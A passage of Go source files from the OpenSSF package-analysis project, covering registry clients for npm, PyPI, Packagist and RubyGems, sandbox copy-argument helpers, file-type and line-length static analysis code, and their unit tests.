57 | */ 58 | func downloadToFile(dest *os.File, url string) error { 59 | if url == "" { 60 | panic("url is empty") 61 | } 62 | 63 | resp, err := http.Get(url) 64 | if err != nil { 65 | return err 66 | } 67 | 68 | defer resp.Body.Close() 69 | 70 | if resp.StatusCode != http.StatusOK { 71 | return fmt.Errorf("http status %s", resp.Status) 72 | } 73 | 74 | if _, err := io.Copy(dest, resp.Body); err != nil { 75 | return err 76 | } 77 | 78 | return nil 79 | } 80 | -------------------------------------------------------------------------------- /internal/pkgmanager/npm.go: -------------------------------------------------------------------------------- 1 | package pkgmanager 2 | 3 | import ( 4 | "encoding/json" 5 | "fmt" 6 | "io" 7 | "net/http" 8 | "strings" 9 | 10 | "github.com/ossf/package-analysis/internal/utils" 11 | "github.com/ossf/package-analysis/pkg/api/pkgecosystem" 12 | ) 13 | 14 | // npmPackageJSON represents relevant JSON data from the NPM registry response 15 | // when package information is requested. 16 | // See https://github.com/npm/registry/blob/master/docs/responses/package-metadata.md 17 | type npmPackageJSON struct { 18 | DistTags struct { 19 | Latest string `json:"latest"` 20 | } `json:"dist-tags"` 21 | } 22 | 23 | // npmVersionJSON represents relevant JSON data from the NPM registry response 24 | // when package version information is requested. 
25 | // See https://github.com/npm/registry/blob/master/docs/responses/package-metadata.md 26 | type npmVersionJSON struct { 27 | Dist struct { 28 | Tarball string `json:"tarball"` 29 | } `json:"dist"` 30 | } 31 | 32 | func getNPMLatest(pkg string) (string, error) { 33 | resp, err := http.Get(fmt.Sprintf("https://registry.npmjs.org/%s", pkg)) 34 | if err != nil { 35 | return "", err 36 | } 37 | defer resp.Body.Close() 38 | 39 | decoder := json.NewDecoder(resp.Body) 40 | var details npmPackageJSON 41 | err = decoder.Decode(&details) 42 | if err != nil { 43 | return "", err 44 | } 45 | 46 | return details.DistTags.Latest, nil 47 | } 48 | 49 | /* 50 | getNPMArchiveFilename generates a filename for a package archive to be downloaded from NPM. 51 | It is generated by replacing any '/' characters in the package name with '-' (ref [1]). 52 | Unlike in [1], the leading '@' is not stripped as '@' characters are allowed in filenames. 53 | The cleaned package name is then concatenated with "-", the version string and ".tgz". 
54 | 55 | [1] https://github.com/npm/cli/blob/8ecbcb9a54b95541f35ebce55d60e4a1feac82c6/lib/commands/pack.js#L64 56 | */ 57 | func getNPMArchiveFilename(pkgName, version, _ string) string { 58 | cleanedName := strings.ReplaceAll(pkgName, "/", "-") 59 | return fmt.Sprintf("%s-%s.tgz", cleanedName, version) 60 | } 61 | 62 | func getNPMArchiveURL(pkgName, version string) (string, error) { 63 | resp, err := http.Get(fmt.Sprintf("https://registry.npmjs.org/%s/%s", pkgName, version)) 64 | if err != nil { 65 | return "", err 66 | } 67 | defer resp.Body.Close() 68 | 69 | responseBytes, err := io.ReadAll(resp.Body) 70 | if err != nil { 71 | return "", fmt.Errorf("error reading HTTP response: %w", err) 72 | } 73 | 74 | responseString := string(responseBytes) 75 | 76 | decoder := json.NewDecoder(strings.NewReader(responseString)) 77 | var packageInfo npmVersionJSON 78 | if err := decoder.Decode(&packageInfo); err != nil { 79 | // invalid version, non-existent package, etc. Details in responseString 80 | return "", fmt.Errorf("%w. 
NPM response: %s", err, responseString) 81 | } 82 | 83 | return packageInfo.Dist.Tarball, nil 84 | } 85 | 86 | var npmPkgManager = PkgManager{ 87 | ecosystem: pkgecosystem.NPM, 88 | latestVersion: getNPMLatest, 89 | archiveURL: getNPMArchiveURL, 90 | archiveFilename: getNPMArchiveFilename, 91 | extractArchive: utils.ExtractArchiveFile, 92 | } 93 | -------------------------------------------------------------------------------- /internal/pkgmanager/package.go: -------------------------------------------------------------------------------- 1 | package pkgmanager 2 | 3 | import ( 4 | "github.com/ossf/package-analysis/pkg/api/pkgecosystem" 5 | ) 6 | 7 | type Pkg struct { 8 | name string 9 | version string 10 | manager *PkgManager 11 | local string 12 | } 13 | 14 | func (p *Pkg) Name() string { 15 | return p.name 16 | } 17 | 18 | func (p *Pkg) Version() string { 19 | return p.version 20 | } 21 | 22 | func (p *Pkg) Ecosystem() pkgecosystem.Ecosystem { 23 | return p.manager.ecosystem 24 | } 25 | 26 | func (p *Pkg) EcosystemName() string { 27 | return string(p.Ecosystem()) 28 | } 29 | 30 | func (p *Pkg) IsLocal() bool { 31 | return p.local != "" 32 | } 33 | 34 | func (p *Pkg) Manager() *PkgManager { 35 | return p.manager 36 | } 37 | 38 | func (p *Pkg) LocalPath() string { 39 | return p.local 40 | } 41 | -------------------------------------------------------------------------------- /internal/pkgmanager/packagist.go: -------------------------------------------------------------------------------- 1 | package pkgmanager 2 | 3 | import ( 4 | "encoding/json" 5 | "fmt" 6 | "net/http" 7 | "strings" 8 | "time" 9 | 10 | "github.com/ossf/package-analysis/pkg/api/pkgecosystem" 11 | ) 12 | 13 | type packagistDistJSON struct { 14 | URL string `json:"url"` 15 | Type string `json:"type"` 16 | Shasum string `json:"shasum,omitempty"` 17 | Reference string `json:"reference"` 18 | } 19 | 20 | func (d *packagistDistJSON) UnmarshalJSON(data []byte) error { 21 | switch string(data) { 22 | 
case "null": 23 | return nil 24 | case `"__unset"`: 25 | return nil 26 | } 27 | type raw packagistDistJSON 28 | return json.Unmarshal(data, (*raw)(d)) 29 | } 30 | 31 | type packagistJSON struct { 32 | Packages map[string][]struct { 33 | Version string `json:"version"` 34 | VersionNormalized string `json:"version_normalized"` 35 | License []string `json:"license,omitempty"` 36 | Time time.Time `json:"time"` 37 | Name string `json:"name,omitempty"` 38 | Dist packagistDistJSON `json:"dist"` 39 | } `json:"packages"` 40 | } 41 | 42 | func getPackagistLatest(pkg string) (string, error) { 43 | resp, err := http.Get(fmt.Sprintf("https://repo.packagist.org/p2/%s.json", pkg)) 44 | if err != nil { 45 | return "", err 46 | } 47 | defer resp.Body.Close() 48 | 49 | decoder := json.NewDecoder(resp.Body) 50 | var details packagistJSON 51 | err = decoder.Decode(&details) 52 | if err != nil { 53 | return "", err 54 | } 55 | 56 | latestVersion := "" 57 | var lastTime time.Time 58 | for _, versions := range details.Packages { 59 | for _, v := range versions { 60 | if v.Time.Before(lastTime) { 61 | continue 62 | } 63 | lastTime = v.Time 64 | latestVersion = v.Version 65 | } 66 | } 67 | 68 | return latestVersion, nil 69 | } 70 | 71 | func getPackagistArchiveURL(pkgName, version string) (string, error) { 72 | resp, err := http.Get(fmt.Sprintf("https://repo.packagist.org/p2/%s.json", pkgName)) 73 | if err != nil { 74 | return "", err 75 | } 76 | defer resp.Body.Close() 77 | 78 | decoder := json.NewDecoder(resp.Body) 79 | var details packagistJSON 80 | err = decoder.Decode(&details) 81 | if err != nil { 82 | return "", err 83 | } 84 | 85 | for _, versions := range details.Packages { 86 | for _, v := range versions { 87 | if v.Version == version { 88 | return v.Dist.URL, nil 89 | } 90 | } 91 | } 92 | 93 | return "", nil 94 | } 95 | 96 | func getPackagistArchiveFilename(pkgName, version, _ string) string { 97 | pkg := strings.Split(pkgName, "/") 98 | return strings.Join([]string{pkg[0], "-", 
pkg[1], "-", version, ".zip"}, "") 99 | } 100 | 101 | var packagistPkgManager = PkgManager{ 102 | ecosystem: pkgecosystem.Packagist, 103 | latestVersion: getPackagistLatest, 104 | archiveURL: getPackagistArchiveURL, 105 | archiveFilename: getPackagistArchiveFilename, 106 | } 107 | -------------------------------------------------------------------------------- /internal/pkgmanager/pypi.go: -------------------------------------------------------------------------------- 1 | package pkgmanager 2 | 3 | import ( 4 | "encoding/json" 5 | "fmt" 6 | "io" 7 | "net/http" 8 | "strings" 9 | 10 | "github.com/ossf/package-analysis/internal/utils" 11 | "github.com/ossf/package-analysis/pkg/api/pkgecosystem" 12 | ) 13 | 14 | // pypiPackageInfoJSON represents relevant JSON data from the PyPI web API response 15 | // when package information is requested. The differences in response format between 16 | // (valid) requests made with a specific package version and with no package version 17 | // are not significant in our case. 18 | // (In particular, if the request contains a valid version, Urls contains a single entry 19 | // holding information for that package version. If the version is unspecified, Urls contains 20 | // an entry corresponding to each version of the package available on PyPI.) 
21 | // See https://warehouse.pypa.io/api-reference/json.html and https://peps.python.org/pep-0691 22 | type pypiPackageInfoJSON struct { 23 | Info struct { 24 | Version string `json:"version"` 25 | } `json:"info"` 26 | URLs []struct { 27 | PackageType string `json:"packagetype"` 28 | URL string `json:"url"` 29 | } `json:"urls"` 30 | } 31 | 32 | func getPyPILatest(pkg string) (string, error) { 33 | resp, err := http.Get(fmt.Sprintf("https://pypi.org/pypi/%s/json", pkg)) 34 | if err != nil { 35 | return "", err 36 | } 37 | defer resp.Body.Close() 38 | 39 | decoder := json.NewDecoder(resp.Body) 40 | var details pypiPackageInfoJSON 41 | err = decoder.Decode(&details) 42 | if err != nil { 43 | return "", err 44 | } 45 | 46 | return details.Info.Version, nil 47 | } 48 | 49 | func getPyPIArchiveURL(pkgName, version string) (string, error) { 50 | resp, err := http.Get(fmt.Sprintf("https://pypi.org/pypi/%s/%s/json", pkgName, version)) 51 | if err != nil { 52 | return "", err 53 | } 54 | defer resp.Body.Close() 55 | 56 | responseBytes, err := io.ReadAll(resp.Body) 57 | if err != nil { 58 | return "", fmt.Errorf("error reading HTTP response: %w", err) 59 | } 60 | 61 | responseString := string(responseBytes) 62 | decoder := json.NewDecoder(strings.NewReader(responseString)) 63 | var packageInfo pypiPackageInfoJSON 64 | err = decoder.Decode(&packageInfo) 65 | if err != nil { 66 | // invalid version, non-existent package, etc. Details in responseString 67 | return "", fmt.Errorf("%w. PyPI response: %s", err, responseString) 68 | } 69 | 70 | // Need to find the archive with PackageType == "sdist" 71 | for _, url := range packageInfo.URLs { 72 | if url.PackageType == "sdist" { 73 | return url.URL, nil 74 | } 75 | } 76 | 77 | // Return an empty string and no error if we can't find an archive URL. 
78 | return "", nil 79 | } 80 | 81 | var pypiPkgManager = PkgManager{ 82 | ecosystem: pkgecosystem.PyPI, 83 | latestVersion: getPyPILatest, 84 | archiveURL: getPyPIArchiveURL, 85 | archiveFilename: defaultArchiveFilename, 86 | extractArchive: utils.ExtractArchiveFile, 87 | } 88 | -------------------------------------------------------------------------------- /internal/pkgmanager/rubygems.go: -------------------------------------------------------------------------------- 1 | package pkgmanager 2 | 3 | import ( 4 | "encoding/json" 5 | "fmt" 6 | "net/http" 7 | 8 | "github.com/ossf/package-analysis/pkg/api/pkgecosystem" 9 | ) 10 | 11 | type rubygemsJSON struct { 12 | Version string `json:"version"` 13 | } 14 | 15 | func getRubyGemsLatest(pkg string) (string, error) { 16 | resp, err := http.Get(fmt.Sprintf("https://rubygems.org/api/v1/gems/%s.json", pkg)) 17 | if err != nil { 18 | return "", err 19 | } 20 | defer resp.Body.Close() 21 | 22 | decoder := json.NewDecoder(resp.Body) 23 | var details rubygemsJSON 24 | err = decoder.Decode(&details) 25 | if err != nil { 26 | return "", err 27 | } 28 | 29 | return details.Version, nil 30 | } 31 | 32 | func getRubyGemsArchiveURL(pkgName, version string) (string, error) { 33 | pkgURL := fmt.Sprintf("https://rubygems.org/gems/%v-%v.gem", pkgName, version) 34 | resp, err := http.Get(pkgURL) 35 | if err != nil { 36 | return "", err 37 | } 38 | defer resp.Body.Close() 39 | 40 | return pkgURL, nil 41 | } 42 | 43 | var rubygemsPkgManager = PkgManager{ 44 | ecosystem: pkgecosystem.RubyGems, 45 | latestVersion: getRubyGemsLatest, 46 | archiveURL: getRubyGemsArchiveURL, 47 | archiveFilename: defaultArchiveFilename, 48 | } 49 | -------------------------------------------------------------------------------- /internal/resultstore/result.go: -------------------------------------------------------------------------------- 1 | package resultstore 2 | 3 | import "github.com/ossf/package-analysis/pkg/api/pkgecosystem" 4 | 5 | // Pkg describes 
the various package details used to populate the package part 6 | // of the analysis results. 7 | type Pkg interface { 8 | Ecosystem() pkgecosystem.Ecosystem 9 | EcosystemName() string 10 | Name() string 11 | Version() string 12 | } 13 | -------------------------------------------------------------------------------- /internal/resultstore/resultstore_test.go: -------------------------------------------------------------------------------- 1 | package resultstore 2 | 3 | import ( 4 | "context" 5 | "fmt" 6 | "os" 7 | "path" 8 | "path/filepath" 9 | "testing" 10 | ) 11 | 12 | func TestFileBucket(t *testing.T) { 13 | tmpDir := t.TempDir() 14 | 15 | testBucketURL := "file://" + tmpDir 16 | fmt.Println(testBucketURL) 17 | 18 | testKeys := []string{ 19 | "test1.txt", 20 | path.Join("testdir", "test2.txt"), // use path not filepath since it's a URL 21 | } 22 | 23 | ctx := context.Background() 24 | 25 | rs := New(testBucketURL) 26 | if rs == nil { 27 | t.Errorf("failed to open create resultstore with URL %s (invalid url)", testBucketURL) 28 | } 29 | 30 | bucket, err := rs.openBucket(ctx) 31 | if err != nil { 32 | t.Errorf("failed to open bucket: %v", err) 33 | } 34 | 35 | for _, key := range testKeys { 36 | t.Run(key, func(t *testing.T) { 37 | writer, err := bucket.NewWriter(ctx, key, nil) 38 | if err != nil { 39 | t.Errorf("failed to create writer: %v", err) 40 | } 41 | 42 | if _, err := writer.Write([]byte("test bytes")); err != nil { 43 | t.Errorf("failed to write to file: %v", err) 44 | } 45 | 46 | if err := writer.Close(); err != nil { 47 | t.Errorf("failed to close writer: %v", err) 48 | } 49 | 50 | if _, err := os.Stat(filepath.Join(tmpDir, key)); err != nil { 51 | t.Errorf("failed to stat file: %v", err) 52 | } 53 | 54 | }) 55 | } 56 | 57 | if err := bucket.Close(); err != nil { 58 | t.Errorf("failed to close bucket: %v", err) 59 | } 60 | } 61 | -------------------------------------------------------------------------------- /internal/sandbox/copy_args.go: 
-------------------------------------------------------------------------------- 1 | package sandbox 2 | 3 | import ( 4 | "fmt" 5 | "strings" 6 | ) 7 | 8 | // copySpec specifies the source and destination of a copy operation. 9 | // The copy may be made from the host into the sandbox or vice versa. 10 | // See https://docs.podman.io/en/latest/markdown/podman-cp.1.html for 11 | // semantics of src and dest paths. 12 | // srcInContainer and destInContainer specify whether the copy source 13 | // and destination are respectively in the host (false) or container (true) 14 | type copySpec struct { 15 | src string 16 | dest string 17 | srcInContainer bool 18 | destInContainer bool 19 | containerId string 20 | } 21 | 22 | func (c copySpec) Args() []string { 23 | copySrc := c.src 24 | if c.srcInContainer { 25 | copySrc = fmt.Sprintf("%s:%s", c.containerId, c.src) 26 | } 27 | 28 | copyDest := c.dest 29 | if c.destInContainer { 30 | copyDest = fmt.Sprintf("%s:%s", c.containerId, c.dest) 31 | } 32 | 33 | return []string{"cp", copySrc, copyDest} 34 | } 35 | 36 | func (c copySpec) String() string { 37 | return strings.Join(c.Args(), " ") 38 | } 39 | 40 | // hostToContainerCopyCmd generates the arguments to podman 41 | // that copy a file from the host to the container. 42 | func hostToContainerCopyCmd(hostPath, containerPath, containerId string) copySpec { 43 | return copySpec{hostPath, containerPath, false, true, containerId} 44 | } 45 | 46 | // hostToContainerCopyCmd generates the arguments to podman 47 | // that copy a file from the container to host. 
48 | func containerToHostCopyCmd(hostPath, containerPath, containerId string) copySpec { 49 | return copySpec{containerPath, hostPath, true, false, containerId} 50 | } 51 | -------------------------------------------------------------------------------- /internal/sandbox/copy_args_test.go: -------------------------------------------------------------------------------- 1 | package sandbox 2 | 3 | import ( 4 | "reflect" 5 | "testing" 6 | ) 7 | 8 | type copyCmdTestCase struct { 9 | name string 10 | hostPath string 11 | containerPath string 12 | containerId string 13 | want []string 14 | } 15 | 16 | func Test_containerToHostCopyCmdArgs(t *testing.T) { 17 | tests := []copyCmdTestCase{ 18 | { 19 | name: "simple relative path", 20 | hostPath: "path/in/host", 21 | containerPath: "path/in/container", 22 | containerId: "12345", 23 | want: []string{"cp", "12345:path/in/container", "path/in/host"}, 24 | }, 25 | { 26 | name: "simple absolute path", 27 | hostPath: "/dest/path/in/host", 28 | containerPath: "/src/path/in/container", 29 | containerId: "abcde", 30 | want: []string{"cp", "abcde:/src/path/in/container", "/dest/path/in/host"}, 31 | }, 32 | } 33 | for _, tt := range tests { 34 | t.Run(tt.name, func(t *testing.T) { 35 | got := containerToHostCopyCmd(tt.hostPath, tt.containerPath, tt.containerId).Args() 36 | if !reflect.DeepEqual(got, tt.want) { 37 | t.Errorf("containerToHostCopyCmd() = %v, want %v", got, tt.want) 38 | } 39 | }) 40 | } 41 | } 42 | 43 | func Test_hostToContainerCopyCmdArgs(t *testing.T) { 44 | tests := []copyCmdTestCase{ 45 | { 46 | name: "simple relative path", 47 | hostPath: "/src", 48 | containerPath: "/dest", 49 | containerId: "12345", 50 | want: []string{"cp", "/src", "12345:/dest"}, 51 | }, 52 | { 53 | name: "simple absolute path", 54 | hostPath: "/src/path/in/host", 55 | containerPath: "/dest/path/in/container", 56 | containerId: "abcde", 57 | want: []string{"cp", "/src/path/in/host", "abcde:/dest/path/in/container"}, 58 | }, 59 | } 60 | for _, tt 
:= range tests { 61 | t.Run(tt.name, func(t *testing.T) { 62 | got := hostToContainerCopyCmd(tt.hostPath, tt.containerPath, tt.containerId).Args() 63 | if !reflect.DeepEqual(got, tt.want) { 64 | t.Errorf("hostToContainerCopyCmd() = %v, want %v", got, tt.want) 65 | } 66 | }) 67 | } 68 | } 69 | -------------------------------------------------------------------------------- /internal/staticanalysis/basicdata/basic_data_test.go: -------------------------------------------------------------------------------- 1 | package basicdata 2 | 3 | import ( 4 | "context" 5 | "os" 6 | "path/filepath" 7 | "reflect" 8 | "testing" 9 | 10 | "github.com/ossf/package-analysis/internal/utils" 11 | "github.com/ossf/package-analysis/pkg/valuecounts" 12 | ) 13 | 14 | type testFile struct { 15 | filename string 16 | contents []byte 17 | contentsHash string 18 | fileType string 19 | lineLengths valuecounts.ValueCounts 20 | } 21 | 22 | var testFiles = []testFile{ 23 | { 24 | filename: "test1.txt", 25 | contents: []byte("hello test 1!\n"), 26 | contentsHash: "bd96959573979235b87180b0b7513c7f1d5cbf046b263f366f2f10fe1b966494", 27 | fileType: "ASCII text", 28 | lineLengths: valuecounts.Count([]int{13}), 29 | }, 30 | { 31 | filename: "test2.txt", 32 | contents: []byte("#! 
/bin/bash\necho 'Hello test 2'\n"), 33 | contentsHash: "6179db3c673ceddcdbd384116ae4d301d64e65fc2686db9ba64945677a5a893c", 34 | fileType: "Bourne-Again shell script, ASCII text executable", 35 | lineLengths: valuecounts.Count([]int{12, 19}), 36 | }, 37 | } 38 | 39 | func TestGetBasicData(t *testing.T) { 40 | tests := []struct { 41 | name string 42 | files []testFile 43 | wantErr bool 44 | }{ 45 | { 46 | name: "test no files", 47 | files: nil, 48 | wantErr: false, 49 | }, 50 | { 51 | name: "test one file", 52 | files: []testFile{testFiles[0]}, 53 | wantErr: false, 54 | }, 55 | { 56 | name: "test two files", 57 | files: []testFile{testFiles[0], testFiles[1]}, 58 | wantErr: false, 59 | }, 60 | } 61 | for _, tt := range tests { 62 | t.Run(tt.name, func(t *testing.T) { 63 | testDir := t.TempDir() 64 | paths := utils.Transform(tt.files, func(f testFile) string { 65 | return filepath.Join(testDir, f.filename) 66 | }) 67 | 68 | for i := range tt.files { 69 | if err := os.WriteFile(paths[i], tt.files[i].contents, 0o666); err != nil { 70 | t.Fatalf("failed to write test file %d: %v", i, err) 71 | } 72 | } 73 | 74 | got, err := Analyze(context.Background(), paths) 75 | if (err != nil) != tt.wantErr { 76 | t.Errorf("detectFileTypes() error = %v, wantErr %v", err, tt.wantErr) 77 | return 78 | } 79 | 80 | wantData := utils.Transform(tt.files, func(f testFile) FileData { 81 | return FileData{ 82 | DetectedType: f.fileType, 83 | Size: int64(len(f.contents)), 84 | SHA256: f.contentsHash, 85 | LineLengths: f.lineLengths, 86 | } 87 | }) 88 | 89 | if !reflect.DeepEqual(got, wantData) { 90 | t.Errorf("TestGetBasicData() data mismatch:\n"+ 91 | "== got == \n%v\n== want ==\n%v", got, wantData) 92 | } 93 | }) 94 | } 95 | } 96 | -------------------------------------------------------------------------------- /internal/staticanalysis/basicdata/describe_files.go: -------------------------------------------------------------------------------- 1 | package basicdata 2 | 3 | import ( 4 | 
"context" 5 | "fmt" 6 | "log/slog" 7 | "os" 8 | "os/exec" 9 | "strings" 10 | 11 | "github.com/ossf/package-analysis/internal/staticanalysis/externalcmd" 12 | ) 13 | 14 | // fileCmdInputArgs describes how to pass file arguments to the `file` command. 15 | type fileCmdArgsHandler struct{} 16 | 17 | func (h fileCmdArgsHandler) SingleFileArg(filePath string) []string { 18 | return []string{filePath} 19 | } 20 | 21 | func (h fileCmdArgsHandler) FileListArg(fileListPath string) []string { 22 | return []string{"--files-from", fileListPath} 23 | } 24 | 25 | func (h fileCmdArgsHandler) ReadStdinArg() []string { 26 | // reads file list from standard input 27 | return h.FileListArg("-") 28 | } 29 | 30 | func detectFileTypes(ctx context.Context, paths []string) ([]string, error) { 31 | workingDir, err := os.MkdirTemp("", "package-analysis-basic-data-*") 32 | if err != nil { 33 | return nil, fmt.Errorf("error creating temp file: %w", err) 34 | } 35 | defer func() { 36 | if err := os.RemoveAll(workingDir); err != nil { 37 | slog.ErrorContext(ctx, "could not remove working directory", "path", workingDir, "error", err) 38 | } 39 | }() 40 | 41 | cmd := exec.CommandContext(ctx, "file", "--brief") 42 | input := externalcmd.MultipleFileInput(paths) 43 | 44 | if err := input.SendTo(cmd, fileCmdArgsHandler{}, workingDir); err != nil { 45 | return nil, fmt.Errorf("failed to prepare input: %w", err) 46 | } 47 | 48 | fileCmdOutput, err := cmd.Output() 49 | if err != nil { 50 | return nil, fmt.Errorf("error running file command: %w", err) 51 | } 52 | 53 | descriptionsString := strings.TrimSpace(string(fileCmdOutput)) 54 | if descriptionsString == "" { 55 | // no files input, probably 56 | return []string{}, nil 57 | } 58 | 59 | // command output is newline-separated list of file types, 60 | // with the order matching the input file list. 
61 | return strings.Split(descriptionsString, "\n"), nil 62 | } 63 | -------------------------------------------------------------------------------- /internal/staticanalysis/linelengths/line_lengths.go: -------------------------------------------------------------------------------- 1 | package linelengths 2 | 3 | import ( 4 | "bufio" 5 | "io" 6 | "os" 7 | "strings" 8 | ) 9 | 10 | /* 11 | GetLineLengths counts the number of characters on each line of a file or string, 12 | returning a slice containing the length of each line in sequence. 13 | 14 | Lines are defined to be separated by newline ('\n') characters. If the newline 15 | character is preceded by a carriage return ('\r'), this will also be treated as 16 | part of the separator. 17 | 18 | If filePath is not empty, the function attempts to count the lines of the file 19 | at that path, otherwise lines in sourceString are counted. 20 | 21 | Note: there may not be much useful information to be gathered by distinguishing 22 | between line lengths when they get very long. It may be pragmatic to just report 23 | all lines above e.g. 64K as 64K long. 24 | */ 25 | func GetLineLengths(filePath string, sourceString string) ([]int, error) { 26 | var reader *bufio.Reader 27 | if len(filePath) > 0 { 28 | file, err := os.Open(filePath) 29 | if err != nil { 30 | return nil, err 31 | } 32 | defer file.Close() 33 | 34 | reader = bufio.NewReader(file) 35 | } else { 36 | reader = bufio.NewReader(strings.NewReader(sourceString)) 37 | } 38 | 39 | lengths := make([]int, 0) 40 | for { 41 | /* Normally bufio.Scanner would be more convenient to use here, however by default 42 | it uses a fixed maximum buffer size (MaxScanTokenSize = 64 * 1024). Since some 43 | (obfuscated) source code may contain very long lines, rather than doing our own 44 | buffer management we'll use reader.ReadStrings, which uses an internal function 45 | (collectFragments) to aggregate multiple full buffers. 
*/ 46 | line, readErr := reader.ReadString('\n') 47 | if readErr != nil && readErr != io.EOF { 48 | return nil, readErr 49 | } 50 | 51 | // remove trailing newline and carriage return if present 52 | // (code adapted from bufio.ReadLine()) 53 | l := len(line) 54 | if l >= 1 { 55 | if line[l-1] == '\n' { 56 | drop := 1 57 | if l >= 2 && line[l-2] == '\r' { 58 | drop = 2 59 | } 60 | l -= drop 61 | } 62 | lengths = append(lengths, l) 63 | } 64 | 65 | if readErr == io.EOF { 66 | break 67 | } 68 | } 69 | 70 | if len(lengths) == 0 { 71 | // define the empty string to have a single empty line 72 | lengths = append(lengths, 0) 73 | } 74 | 75 | return lengths, nil 76 | } 77 | -------------------------------------------------------------------------------- /internal/staticanalysis/linelengths/line_lengths_test.go: -------------------------------------------------------------------------------- 1 | package linelengths 2 | 3 | import ( 4 | "reflect" 5 | "testing" 6 | ) 7 | 8 | func TestSourceStringLineLengths(t *testing.T) { 9 | tests := []struct { 10 | name string 11 | source string 12 | want []int 13 | wantErr bool 14 | }{ 15 | { 16 | name: "test simple multiline", 17 | source: ` 18 | One 19 | Two 20 | Three 21 | Four 22 | Five 23 | `, 24 | want: []int{0, 3, 3, 5, 4, 4}, 25 | wantErr: false, 26 | }, 27 | { 28 | name: "test simple single line", 29 | source: `One Two Three Four Five`, 30 | want: []int{23}, 31 | wantErr: false, 32 | }, 33 | { 34 | name: "test empty string", 35 | source: ``, 36 | want: []int{0}, 37 | wantErr: false, 38 | }, 39 | { 40 | name: "test single char", 41 | source: "a", 42 | want: []int{1}, 43 | wantErr: false, 44 | }, 45 | { 46 | name: "test empty newline", 47 | source: ` 48 | `, 49 | want: []int{0}, 50 | wantErr: false, 51 | }, 52 | 53 | { 54 | name: "test carriage return", 55 | source: "\r\n", 56 | want: []int{0}, 57 | wantErr: false, 58 | }, 59 | } 60 | for _, tt := range tests { 61 | t.Run(tt.name, func(t *testing.T) { 62 | got, err := 
GetLineLengths("", tt.source) 63 | if (err != nil) != tt.wantErr { 64 | t.Errorf("GetLineLengths() error = %v, wantErr %v", err, tt.wantErr) 65 | return 66 | } 67 | if !reflect.DeepEqual(got, tt.want) { 68 | t.Errorf("GetLineLengths() got = %v, want %v", got, tt.want) 69 | } 70 | }) 71 | } 72 | } 73 | -------------------------------------------------------------------------------- /internal/staticanalysis/parsing/init_parser.go: -------------------------------------------------------------------------------- 1 | package parsing 2 | 3 | import ( 4 | "context" 5 | _ "embed" 6 | "fmt" 7 | "os" 8 | "os/exec" 9 | "path/filepath" 10 | 11 | "github.com/ossf/package-analysis/internal/utils" 12 | ) 13 | 14 | // babelParser holds the content of the parser script. 15 | // 16 | //go:embed babel-parser.js 17 | var babelParser []byte 18 | 19 | // packageJSON holds the content of the NPM package.json file, with information 20 | // about the dependencies for the parser 21 | // 22 | //go:embed package.json 23 | var packageJSON []byte 24 | 25 | // packageLockJSON holds the content of the NPM package-lock.json file, with 26 | // information about versions and hashes of dependencies for the parser 27 | // 28 | //go:embed package-lock.json 29 | var packageLockJSON []byte 30 | 31 | const ( 32 | parserFileName = "babel-parser.js" 33 | packageJSONFileName = "package.json" 34 | packageLockJSONFileName = "package-lock.json" 35 | ) 36 | 37 | // npmCacheDir is used to check for cached versions of NPM dependencies before 38 | // downloading them from a remote source. The directory is populated by the 39 | // Docker build for the container this code will run in. 
40 | const npmCacheDir = "/npm_cache" 41 | 42 | type ParserConfig struct { 43 | InstallDir string 44 | ParserPath string 45 | } 46 | 47 | type parserFile struct { 48 | name string 49 | contents []byte 50 | isExecutable bool 51 | } 52 | 53 | var parserFiles = []parserFile{ 54 | {parserFileName, babelParser, false}, 55 | {packageJSONFileName, packageJSON, false}, 56 | {packageLockJSONFileName, packageLockJSON, false}, 57 | } 58 | 59 | func InitParser(ctx context.Context, installDir string) (ParserConfig, error) { 60 | if err := os.MkdirAll(installDir, 0o777); err != nil { 61 | return ParserConfig{}, fmt.Errorf("error creating JS parser directory: %w", err) 62 | } 63 | 64 | for _, file := range parserFiles { 65 | writePath := filepath.Join(installDir, file.name) 66 | if err := utils.WriteFile(writePath, file.contents, file.isExecutable); err != nil { 67 | return ParserConfig{}, fmt.Errorf("error writing %s to %s: %w", file.name, installDir, err) 68 | } 69 | } 70 | 71 | // run npm install in that folder 72 | npmArgs := []string{"ci", "--silent", "--no-progress", "--prefix", installDir} 73 | 74 | fileInfo, err := os.Stat(npmCacheDir) 75 | cacheDirAccessible := err == nil && fileInfo.IsDir() && (fileInfo.Mode().Perm()&0o700 == 0o700) 76 | if cacheDirAccessible { 77 | npmArgs = append(npmArgs, "--cache", npmCacheDir, "--prefer-offline") 78 | } 79 | 80 | cmd := exec.CommandContext(ctx, "npm", npmArgs...) 
81 | if err := cmd.Run(); err != nil { 82 | return ParserConfig{}, fmt.Errorf("npm install error: %w", err) 83 | } 84 | 85 | return ParserConfig{ 86 | InstallDir: installDir, 87 | ParserPath: filepath.Join(installDir, parserFileName), 88 | }, nil 89 | } 90 | -------------------------------------------------------------------------------- /internal/staticanalysis/parsing/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "package-analysis-js-parsing", 3 | "version": "1.0.0", 4 | "type": "module", 5 | "dependencies": { 6 | "@babel/parser": "^7.26.5", 7 | "@babel/traverse": "^7.26.5" 8 | } 9 | } 10 | -------------------------------------------------------------------------------- /internal/staticanalysis/parsing/result.go: -------------------------------------------------------------------------------- 1 | package parsing 2 | 3 | import ( 4 | "fmt" 5 | "strings" 6 | 7 | "github.com/ossf/package-analysis/pkg/api/staticanalysis/token" 8 | ) 9 | 10 | // SingleResult holds processed information about source code tokens 11 | // found in a single file by a single language parser 12 | type SingleResult struct { 13 | Language Language `json:"language"` 14 | Identifiers []token.Identifier `json:"identifiers"` 15 | StringLiterals []token.String `json:"string_literals"` 16 | IntLiterals []token.Int `json:"int_literals"` 17 | FloatLiterals []token.Float `json:"float_literals"` 18 | Comments []token.Comment `json:"comments"` 19 | // future: external function calls / references (e.g. 
